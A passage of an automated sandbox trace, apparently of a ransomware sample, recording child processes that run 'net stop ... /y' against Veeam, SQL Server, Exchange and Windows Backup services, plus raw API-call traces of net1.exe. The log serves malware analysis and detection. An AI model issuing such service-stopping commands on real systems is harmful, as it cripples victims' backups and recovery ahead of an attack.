"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 711 os_tid = 0xeac Process: id = "306" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x4f5bf000" os_pid = "0xf80" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x71c" cmd_line = "\"net.exe\" stop swi_update /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 712 os_tid = 0xf74 Process: id = "307" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x5b2c4000" os_pid = "0xb80" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x71c" cmd_line = "\"net.exe\" stop SQLAgent$VEEAMSQL2008R2 /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 713 os_tid = 0x5a8 Process: id = "308" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x5c7c9000" os_pid = "0x618" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x71c" cmd_line = "\"net.exe\" stop swi_update_64 /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 714 os_tid = 0x13f8 Process: id = "309" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x507ce000" os_pid = "0x35c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x71c" cmd_line = "\"net.exe\" stop SQLAgent$VEEAMSQL2012 /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 716 os_tid = 0xa48 Process: id = "310" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x502db000" os_pid = "0xfe0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x71c" cmd_line = "\"net.exe\" stop VeeamDeploySvc /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 718 os_tid = 0xf18 Process: id = "311" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x529e0000" os_pid = "0xf54" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x71c" cmd_line = "\"net.exe\" stop MSOLAP$TPS /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 719 os_tid = 0xf0c Process: id = "312" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0x61ebc000" os_pid = "0x5e0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "169" os_parent_pid = "0x119c" cmd_line = "C:\\Windows\\system32\\net1 stop MSExchangeMGMT /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 720 os_tid = 0xe5c [0128.415] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x24f8fc | out: lpSystemTimeAsFileTime=0x24f8fc*(dwLowDateTime=0x2046db50, dwHighDateTime=0x1d6f0d1)) [0128.415] GetCurrentProcessId () returned 0x5e0 [0128.415] GetCurrentThreadId () returned 0xe5c [0128.415] GetTickCount () returned 0x1153544 [0128.415] QueryPerformanceCounter (in: lpPerformanceCount=0x24f8f4 | out: lpPerformanceCount=0x24f8f4*=24751599798) returned 1 [0128.415] GetModuleHandleA (lpModuleName=0x0) returned 0xe40000 [0128.415] __set_app_type (_Type=0x1) [0128.415] __p__fmode () returned 0x770331f4 [0128.415] __p__commode () returned 0x770331fc [0128.416] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xe4ffe6) returned 0x0 [0128.416] __getmainargs (in: _Argc=0xe59064, _Argv=0xe5906c, _Env=0xe59068, _DoWildCard=0, _StartInfo=0xe59024 | out: _Argc=0xe59064, _Argv=0xe5906c, _Env=0xe59068) returned 0 [0128.416] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0128.416] GetConsoleOutputCP () returned 0x1b5 [0128.416] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xe59080 | out: lpCPInfo=0xe59080) returned 1 [0128.416] SetThreadUILanguage (LangId=0x0) returned 0x409 [0128.419] sprintf_s (in: _DstBuf=0x24f8b4, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0128.419] setlocale (category=0, locale=".437") returned="English_United States.437" [0128.421] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3e0 [0128.421] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0128.421] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop MSExchangeMGMT /y" [0128.422] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x24f680, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0128.422] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x70) returned 0x523ae0 [0128.422] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0128.422] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x24f884 | out: Buffer=0x24f884*=0x521ae8) returned 0x0 [0128.422] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x24f884 | out: Buffer=0x24f884*=0x521b00) returned 0x0 [0128.422] _fileno (_File=0x77032900) returned -2 [0128.422] _setmode (_FileHandle=-2, _Mode=16384) returned -1 [0128.422] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0128.422] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0128.422] _wcsicmp (_String1="config", _String2="stop") returned -16 [0128.422] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0128.422] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0128.422] _wcsicmp (_String1="file", _String2="stop") returned -13 [0128.422] _wcsicmp (_String1="files", _String2="stop") returned -13 [0128.422] _wcsicmp (_String1="group", _String2="stop") returned -12 [0128.422] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0128.422] _wcsicmp (_String1="help", _String2="stop") returned -11 [0128.422] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0128.422] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0128.422] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0128.422] _wcsicmp (_String1="session", _String2="stop") returned -15 [0128.422] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0128.423] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0128.423] _wcsicmp (_String1="share", _String2="stop") returned -12 [0128.423] _wcsicmp (_String1="start", _String2="stop") returned -14 [0128.423] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0128.423] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0128.423] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0128.423] _wcsicmp (_String1="accounts", _String2="MSExchangeMGMT") returned -12 [0128.423] _wcsicmp (_String1="computer", _String2="MSExchangeMGMT") returned -10 [0128.423] _wcsicmp (_String1="config", _String2="MSExchangeMGMT") returned -10 [0128.423] _wcsicmp (_String1="continue", _String2="MSExchangeMGMT") returned -10 [0128.423] _wcsicmp (_String1="cont", _String2="MSExchangeMGMT") returned -10 [0128.423] _wcsicmp (_String1="file", _String2="MSExchangeMGMT") returned -7 [0128.423] _wcsicmp (_String1="files", _String2="MSExchangeMGMT") returned -7 [0128.423] _wcsicmp (_String1="group", _String2="MSExchangeMGMT") returned -6 [0128.423] _wcsicmp (_String1="groups", _String2="MSExchangeMGMT") returned -6 [0128.423] _wcsicmp (_String1="help", _String2="MSExchangeMGMT") returned -5 [0128.423] _wcsicmp (_String1="helpmsg", _String2="MSExchangeMGMT") returned -5 [0128.423] _wcsicmp (_String1="localgroup", _String2="MSExchangeMGMT") returned -1 [0128.423] _wcsicmp (_String1="pause", _String2="MSExchangeMGMT") returned 3 [0128.423] _wcsicmp (_String1="session", _String2="MSExchangeMGMT") returned 6 [0128.423] _wcsicmp (_String1="sessions", _String2="MSExchangeMGMT") returned 6 [0128.423] _wcsicmp (_String1="sess", _String2="MSExchangeMGMT") returned 6 [0128.423] _wcsicmp (_String1="share", _String2="MSExchangeMGMT") returned 6 [0128.423] _wcsicmp (_String1="start", _String2="MSExchangeMGMT") returned 6 [0128.423] _wcsicmp (_String1="stats", _String2="MSExchangeMGMT") returned 6 [0128.423] _wcsicmp (_String1="statistics", _String2="MSExchangeMGMT") returned 6 [0128.423] _wcsicmp (_String1="stop", _String2="MSExchangeMGMT") returned 6 [0128.423] _wcsicmp (_String1="time", _String2="MSExchangeMGMT") returned 7 [0128.423] _wcsicmp (_String1="user", _String2="MSExchangeMGMT") returned 8 [0128.423] _wcsicmp (_String1="users", _String2="MSExchangeMGMT") returned 8 [0128.423] _wcsicmp (_String1="msg", _String2="MSExchangeMGMT") returned 2 [0128.423] _wcsicmp (_String1="messenger", _String2="MSExchangeMGMT") returned -14 [0128.423] _wcsicmp (_String1="receiver", _String2="MSExchangeMGMT") returned 5 [0128.423] _wcsicmp (_String1="rcv", _String2="MSExchangeMGMT") returned 5 [0128.423] _wcsicmp (_String1="netpopup", _String2="MSExchangeMGMT") returned 1 [0128.424] _wcsicmp (_String1="redirector", _String2="MSExchangeMGMT") returned 5 [0128.424] _wcsicmp (_String1="redir", _String2="MSExchangeMGMT") returned 5 [0128.424] _wcsicmp (_String1="rdr", _String2="MSExchangeMGMT") returned 5 [0128.424] _wcsicmp (_String1="workstation", _String2="MSExchangeMGMT") returned 10 [0128.424] _wcsicmp (_String1="work", _String2="MSExchangeMGMT") returned 10 [0128.424] _wcsicmp (_String1="wksta", _String2="MSExchangeMGMT") returned 10 [0128.424] _wcsicmp (_String1="prdr", _String2="MSExchangeMGMT") returned 3 [0128.424] _wcsicmp (_String1="devrdr", _String2="MSExchangeMGMT") returned -9 [0128.424] _wcsicmp (_String1="lanmanworkstation", _String2="MSExchangeMGMT") returned -1 [0128.424] _wcsicmp (_String1="server", _String2="MSExchangeMGMT") returned 6 [0128.424] _wcsicmp (_String1="svr", _String2="MSExchangeMGMT") returned 6 [0128.424] _wcsicmp (_String1="srv", _String2="MSExchangeMGMT") returned 6 [0128.424] _wcsicmp (_String1="lanmanserver", _String2="MSExchangeMGMT") returned -1 [0128.424] _wcsicmp (_String1="alerter", _String2="MSExchangeMGMT") returned -12 [0128.424] _wcsicmp (_String1="netlogon", _String2="MSExchangeMGMT") returned 1 [0128.424] _wcsupr (in: _String="MSExchangeMGMT" | out: _String="MSEXCHANGEMGMT") returned="MSEXCHANGEMGMT" [0128.424] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x5254b0 [0128.656] GetServiceKeyNameW (in: hSCManager=0x5254b0, lpDisplayName="MSEXCHANGEMGMT", lpServiceName=0xe5aaf0, lpcchBuffer=0x24f820 | out: lpServiceName="", lpcchBuffer=0x24f820) returned 0 [0128.657] _wcsicmp (_String1="msg", _String2="MSEXCHANGEMGMT") returned 2 [0128.657] _wcsicmp (_String1="messenger", _String2="MSEXCHANGEMGMT") returned -14 [0128.657] _wcsicmp (_String1="receiver", _String2="MSEXCHANGEMGMT") returned 5 [0128.657] _wcsicmp (_String1="rcv", _String2="MSEXCHANGEMGMT") returned 5 [0128.657] _wcsicmp (_String1="redirector", _String2="MSEXCHANGEMGMT") returned 5 [0128.657] _wcsicmp (_String1="redir", _String2="MSEXCHANGEMGMT") returned 5 [0128.657] _wcsicmp (_String1="rdr", _String2="MSEXCHANGEMGMT") returned 5 [0128.657] _wcsicmp (_String1="workstation", _String2="MSEXCHANGEMGMT") returned 10 [0128.657] _wcsicmp (_String1="work", _String2="MSEXCHANGEMGMT") returned 10 [0128.657] _wcsicmp (_String1="wksta", _String2="MSEXCHANGEMGMT") returned 10 [0128.658] _wcsicmp (_String1="prdr", _String2="MSEXCHANGEMGMT") returned 3 [0128.658] _wcsicmp (_String1="devrdr", _String2="MSEXCHANGEMGMT") returned -9 [0128.658] _wcsicmp (_String1="lanmanworkstation", _String2="MSEXCHANGEMGMT") returned -1 [0128.658] _wcsicmp (_String1="server", _String2="MSEXCHANGEMGMT") returned 6 [0128.658] _wcsicmp (_String1="svr", _String2="MSEXCHANGEMGMT") returned 6 [0128.658] _wcsicmp (_String1="srv", _String2="MSEXCHANGEMGMT") returned 6 [0128.658] _wcsicmp (_String1="lanmanserver", _String2="MSEXCHANGEMGMT") returned -1 [0128.658] _wcsicmp (_String1="alerter", _String2="MSEXCHANGEMGMT") returned -12 [0128.658] _wcsicmp (_String1="netlogon", _String2="MSEXCHANGEMGMT") returned 1 [0128.658] NetServiceControl (in: servername=0x0, service="MSEXCHANGEMGMT", opcode=0x0, arg=0x0, bufptr=0x24f81c | out: bufptr=0x24f81c) returned 0x889 [0128.660] wcscpy_s (in: _Destination=0xe5a4e8, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0128.660] LoadLibraryW (lpLibFileName="NETMSG") returned 0x74420000 [0128.661] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x74420000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0xe5b338, nSize=0x800, Arguments=0xe59dd8 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0128.662] GetFileType (hFile=0x0) returned 0x0 [0128.662] LocalAlloc (uFlags=0x0, uBytes=0x3c) returned 0x523ed0 [0128.662] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="The service name is invalid.\r\n", cchWideChar=30, lpMultiByteStr=0x523ed0, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="The service name is invalid.\r\n", lpUsedDefaultChar=0x0) returned 30 [0128.662] WriteFile (in: hFile=0x0, lpBuffer=0x523ed0, nNumberOfBytesToWrite=0x1e, lpNumberOfBytesWritten=0x24f75c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x24f75c, lpOverlapped=0x0) returned 0 [0128.662] LocalFree (hMem=0x523ed0) returned 0x0 [0128.662] GetFileType (hFile=0x0) returned 0x0 [0128.662] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x526178 [0128.662] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x526178, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\nR", lpUsedDefaultChar=0x0) returned 2 [0128.662] WriteFile (in: hFile=0x0, lpBuffer=0x526178, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x24f75c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x24f75c, lpOverlapped=0x0) returned 0 [0128.663] LocalFree (hMem=0x526178) returned 0x0 [0128.663] _ultow (in: _Dest=0x889, _Radix=2422668 | out: _Dest=0x889) returned="2185" [0128.663] FormatMessageW (in: dwFlags=0x2800, lpSource=0x74420000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0xe5b338, nSize=0x800, Arguments=0xe59dd8 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0128.663] GetFileType (hFile=0x0) returned 0x0 [0128.663] LocalAlloc (uFlags=0x0, uBytes=0x68) returned 0x526178 [0128.663] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="More help is available by typing NET HELPMSG 2185.\r\n", cchWideChar=52, lpMultiByteStr=0x526178, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="More help is available by typing NET HELPMSG 2185.\r\n\x04", lpUsedDefaultChar=0x0) returned 52 [0128.663] WriteFile (in: hFile=0x0, lpBuffer=0x526178, nNumberOfBytesToWrite=0x34, lpNumberOfBytesWritten=0x24f768, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x24f768, lpOverlapped=0x0) returned 0 [0128.663] LocalFree (hMem=0x526178) returned 0x0 [0128.663] GetFileType (hFile=0x0) returned 0x0 [0128.663] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x526178 [0128.663] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x526178, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\nR", lpUsedDefaultChar=0x0) returned 2 [0128.663] WriteFile (in: hFile=0x0, lpBuffer=0x526178, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x24f768, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x24f768, lpOverlapped=0x0) returned 0 [0128.663] LocalFree (hMem=0x526178) returned 0x0 [0128.664] NetApiBufferFree (Buffer=0x521ae8) returned 0x0 [0128.664] NetApiBufferFree (Buffer=0x521b00) returned 0x0 [0128.664] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop MSExchangeMGMT /y" [0128.664] exit (_Code=2) Process: id = "313" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0x4f961000" os_pid = "0xf2c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "170" os_parent_pid = "0x11c4" cmd_line = "C:\\Windows\\system32\\net1 stop wbengine /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 721 os_tid = 0xc98 [0128.344] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x10fdac | out: lpSystemTimeAsFileTime=0x10fdac*(dwLowDateTime=0x203d55d0, dwHighDateTime=0x1d6f0d1)) [0128.344] GetCurrentProcessId () returned 0xf2c [0128.344] GetCurrentThreadId () returned 0xc98 [0128.344] GetTickCount () returned 0x1153505 [0128.344] QueryPerformanceCounter (in: lpPerformanceCount=0x10fda4 | out: lpPerformanceCount=0x10fda4*=24744517995) returned 1 [0128.345] GetModuleHandleA (lpModuleName=0x0) returned 0xe40000 [0128.345] __set_app_type (_Type=0x1) [0128.345] __p__fmode () returned 0x770331f4 [0128.345] __p__commode () returned 0x770331fc [0128.345] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xe4ffe6) returned 0x0 [0128.345] __getmainargs (in: _Argc=0xe59064, _Argv=0xe5906c, _Env=0xe59068, _DoWildCard=0, _StartInfo=0xe59024 | out: _Argc=0xe59064, _Argv=0xe5906c, _Env=0xe59068) returned 0 [0128.345] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0128.345] GetConsoleOutputCP () returned 0x1b5 [0128.346] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xe59080 | out: lpCPInfo=0xe59080) returned 1 [0128.346] SetThreadUILanguage (LangId=0x0) returned 0x409 [0128.349] sprintf_s (in: _DstBuf=0x10fd64, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0128.349] setlocale (category=0, locale=".437") returned="English_United States.437" [0128.351] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3e0 [0128.351] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0128.351] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop wbengine /y" [0128.351] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x10fb30, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0128.351] RtlAllocateHeap (HeapHandle=0x220000, Flags=0x0, Size=0x64) returned 0x233ad8 [0128.351] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0128.351] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x10fd34 | out: Buffer=0x10fd34*=0x231ae0) returned 0x0 [0128.352] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x10fd34 | out: Buffer=0x10fd34*=0x231af8) returned 0x0 [0128.352] _fileno (_File=0x77032900) returned -2 [0128.352] _setmode (_FileHandle=-2, _Mode=16384) returned -1 [0128.352] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0128.352] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0128.352] _wcsicmp (_String1="config", _String2="stop") returned -16 [0128.352] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0128.352] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0128.352] _wcsicmp (_String1="file", _String2="stop") returned -13 [0128.352] _wcsicmp (_String1="files", _String2="stop") returned -13 [0128.352] _wcsicmp (_String1="group", _String2="stop") returned -12 [0128.352] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0128.352] _wcsicmp (_String1="help", _String2="stop") returned -11 [0128.352] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0128.352] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0128.352] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0128.352] _wcsicmp (_String1="session", _String2="stop") returned -15 [0128.352] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0128.352] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0128.352] _wcsicmp (_String1="share", _String2="stop") returned -12 [0128.352] _wcsicmp (_String1="start", _String2="stop") returned -14 [0128.352] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0128.352] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0128.352] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0128.352] _wcsicmp (_String1="accounts", _String2="wbengine") returned -22 [0128.352] _wcsicmp (_String1="computer", _String2="wbengine") returned -20 [0128.352] _wcsicmp (_String1="config", _String2="wbengine") returned -20 [0128.352] _wcsicmp (_String1="continue", _String2="wbengine") returned -20 [0128.352] _wcsicmp (_String1="cont", _String2="wbengine") returned -20 [0128.352] _wcsicmp (_String1="file", _String2="wbengine") returned -17 [0128.352] _wcsicmp (_String1="files", _String2="wbengine") returned -17 [0128.352] _wcsicmp (_String1="group", _String2="wbengine") returned -16 [0128.352] _wcsicmp (_String1="groups", _String2="wbengine") returned -16 [0128.353] _wcsicmp (_String1="help", _String2="wbengine") returned -15 [0128.353] _wcsicmp (_String1="helpmsg", _String2="wbengine") returned -15 [0128.353] _wcsicmp (_String1="localgroup", _String2="wbengine") returned -11 [0128.353] _wcsicmp (_String1="pause", _String2="wbengine") returned -7 [0128.353] _wcsicmp (_String1="session", _String2="wbengine") returned -4 [0128.353] _wcsicmp (_String1="sessions", _String2="wbengine") returned -4 [0128.353] _wcsicmp (_String1="sess", _String2="wbengine") returned -4 [0128.353] _wcsicmp (_String1="share", _String2="wbengine") returned -4 [0128.353] _wcsicmp (_String1="start", _String2="wbengine") returned -4 [0128.353] _wcsicmp (_String1="stats", _String2="wbengine") returned -4 [0128.353] _wcsicmp (_String1="statistics", _String2="wbengine") returned -4 [0128.353] _wcsicmp (_String1="stop", _String2="wbengine") returned -4 [0128.353] _wcsicmp (_String1="time", _String2="wbengine") returned -3 [0128.353] _wcsicmp (_String1="user", _String2="wbengine") returned -2 [0128.353] _wcsicmp (_String1="users", _String2="wbengine") returned -2 [0128.353] _wcsicmp (_String1="msg", _String2="wbengine") returned -10 [0128.353] _wcsicmp (_String1="messenger", _String2="wbengine") returned -10 [0128.353] _wcsicmp (_String1="receiver", _String2="wbengine") returned -5 [0128.353] _wcsicmp (_String1="rcv", _String2="wbengine") returned -5 [0128.353] _wcsicmp (_String1="netpopup", _String2="wbengine") returned -9 [0128.353] _wcsicmp (_String1="redirector", _String2="wbengine") returned -5 [0128.353] _wcsicmp (_String1="redir", _String2="wbengine") returned -5 [0128.353] _wcsicmp (_String1="rdr", _String2="wbengine") returned -5 [0128.353] _wcsicmp (_String1="workstation", _String2="wbengine") returned 13 [0128.353] _wcsicmp (_String1="work", _String2="wbengine") returned 13 [0128.353] _wcsicmp (_String1="wksta", _String2="wbengine") returned 9 [0128.353] _wcsicmp (_String1="prdr", _String2="wbengine") returned -7 [0128.353] _wcsicmp (_String1="devrdr", _String2="wbengine") returned -19 [0128.353] _wcsicmp (_String1="lanmanworkstation", _String2="wbengine") returned -11 [0128.353] 